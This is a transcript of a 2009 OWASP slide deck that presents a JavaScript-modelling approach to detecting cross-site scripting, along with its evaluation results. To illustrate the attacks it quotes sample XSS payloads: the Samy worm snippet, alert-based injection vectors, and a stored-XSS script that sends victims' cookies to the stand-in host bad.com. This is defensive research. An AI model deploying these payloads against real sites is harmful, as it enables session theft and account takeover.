OWASP Plan - Strawman
Transcript of OWASP Plan - Strawman
Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
A new approach to XSS Detection using JavaScript Modeling
Ofer [email protected] [email protected]
September 2009
OWASP 2
Agenda
Background and Motivation
Current Solutions…and drawbacks
Our Approach
Evaluation and Results
Conclusion & Further Work
OWASP 4
Web Application Vulnerabilities
Source:IBM Internet Security Systems X-Force® 2008 Trend & Risk Report
OWASP 5
Closer Look
Source: “WhiteHat Website Security Statistic Reports”, Dec 2008
OWASP 6
Attackers Prefer the Application Layer
The application layer is the weakest link – no generic defense mechanism.
The application layer leads the attacker directly to the data.
A plethora of freely available web applications.
Very simple to perform.Every input has the potential to be an
attack vector.In order to (really) fix must change code
(On average, 60 days to repair XSS vulnerability).
OWASP 7
MySpace.com virus (a.k.a Samy worm)
Date: October 5, 2005. Target: force users to become my friends. Samy inserted raw HTML into his profile.
<div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')">
The payload adds Samy to visitor’s friends and copy itself to visitor’s profile.
MySpace was forced to shutdown its website, fix the vulnerability, and perform clean up.
Source: XSS WORMS AND VIRUSES The Impending Threat and the Best Defense, APRIL 2006 , Jeremiah Grossman.
OWASP 8
XSS in Details Three known types:
Reflected (Non-Persistent) Stored (Persistent) DOM Based (Local)
The target is to run hostile JavaScript on the victims browser.
JavaScript malware can: Steal Cookie Map internal networks Spread like a worm …
OWASP 9
Reflected XSS
Request http://www.website.com/
index.php?name=Jim
Response<html>
<body>Hello, Jim...
Request http://www.website.com/
index.php?name=Jim<script>alert("XSS")</script>
Response<html>
<body>Hello, Jim<script>alert("XSS")</
script>...Browser – assumes server doesn’t send malicious
content Parse HTML – build DOM Fetch resources and execute them.
Browser – assumes server doesn’t send malicious content
Parse HTML – build DOM Fetch resources and execute them.
OWASP 10
Stored XSS
OWASP 11
Stored XSS
Trudy posts the following text on a message board:Great message! <script>
var img=new Image();img.src=
"http://www.bad.com/CookieStealer/Form1.aspx?s= "+document.cookie;
</script>
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy
OWASP 12
DOM-Based XSS
First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml)
http://victim/promo?product_id=100&title=Last+Chancehttp://victim/promo?
product_id=100&title=Foo#<SCRIPT>alert('XSS') </SCRIPT>
<script>var url =
window.location.href;var pos =
url.indexOf("title=") + 6;var len = url.length;var title_string =
url.substring(pos,len);
document.write(title_string);</script>
pos len
Last Chance !xss
OWASP 1313
Current Solutions
XSS is a sub-problem of Insufficient Input Validation.
Server-Side Application Static/Dynamic code analysis (white box) Web application scanners (black box)
Server-Side Proxy Input validation Escaping\Output encoding (‘<‘ <) HTTP-request anomaly detection
Client-Side Disable JS. Noxes - a web proxy that fetches HTTP requests and
can either block or allow based on current security policy.
OWASP 14
Problems with current solutions
Escaping - Good practice ! But, Many web-application permit and return HTML
tags (<b>, <ul>…)What about URI scheme like javascript:
Blacklisting (negative logic) is difficult <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> …and 100+ more attack vectors in RSnake’s XSS Cheatsheet. An effective filter must also ensure that is does not introduces
new scripts Before: <img src=". . . " target="onload="malicious script"> After: <img src=". . . " onload="malicious script">
14
OWASP 15
Problems with current solutions (cont.)
Focusing only on HTTP-request is problematic Even if an attack was detected, it doesn’t mean it will
actually occur (false positive). What about Stored XSS attacks ?
Client-side solutions Deployment Browser modifications/integration.
15
OWASP 1616
Problems with current solutions (cont.)
GET http://bank.com/main.php?uName=JackMain()
• echo (“<SCRIPT>”)• echo (“Document.write(
“Hello” + $uName);”)• echo (“</SCRIPT>
Hello Jack
<script>
Document.write(“Hello” + “Jack”);
</script>
OWASP 1717
Problems with current solutions (cont.)
GET http://bank.com/main.php?uName=Jack”);alert(‘xss!’)
Main()• echo (“<SCRIPT>”)• echo (“Document.write(
“Hello” + $uName);”)• echo (“</SCRIPT>
Hello Jack
<script>
Document.write(“Hello” + “Jack”);
alert(‘xss’);
</script>
xss!
OWASP 1818
Our Approach
Positive security logicAnything is illegal unless known to be legal
Focus on HTTP responseModel – code-script elements in HTML web-
pagesAssumption: the set of all instances of code-
script elements is bounded and can be learned in a relative short period.
1st try – JavaScript code is static.2nd try – JavaScript code is static under some
transformation.
OWASP 1919
Detector Architecture
OWASP 2020
XSS Attack Detection
Learning modeFor each extracted JS:
Learn regular form. Learn canonicalized
form.
Three concerns Coverage Updating
– Deploy detector in testing environment.
– Perform deeper inspection.
Learning data-set should be with no malicious JS
Detection modeFor each unknown
JS do: Further inspection. Strip out Inform web-admin
OWASP 2121
Deployment options
Web proxyProtect a single web-application
Integration with the browser JS extraction is done by browser.Defend against DOM-based XSS. Improved performance.
Web Application
Web Proxy
Client
OWASP 2222
Evaluation Methodology
FP Choose top-ranked 40 web-application. Crawl each web application Learn each web-page & build code-elements DB Perform 2 tests:
Convergence test: #pages to needed to learn all JS. FP test: FP = (#pages causing alarm)/(#pages).
FN Test detector against RSnake’s cheat-sheet. Choose vulnerable application from xssed.com Generate benign-input and attack-input. Learn with benign. Detect with attack. Each result was also checked
manually.
OWASP 2323
Results
Zero FP
FN – all attacks were detected. Convergence Test
0
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
0 5 10 15 20 25 30 35 40 45
Number of pag es to learn till c onverg nenc e
CD
F
OWASP 2424
Conclusion
Zero FP under canonicalizationGeneric - targets all types of XSS
Even DOM-Based could be mitigated if web proxy is deployed on client side.
Fast convergence – short learning periodNumber of canonicalized JS nodes is bounded.Most JS nodes appear in every page (“building
blocks”).
Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Thanx !
Ofer [email protected]
September 2009